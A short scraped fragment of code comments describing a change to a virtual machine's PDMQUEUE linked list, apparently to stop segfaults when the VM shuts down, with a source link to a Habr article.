; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown ; Before: "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL ; After: "E1000-Xmit" -> NULL
, .
Source: https://habr.com/ru/post/429004/
All Articles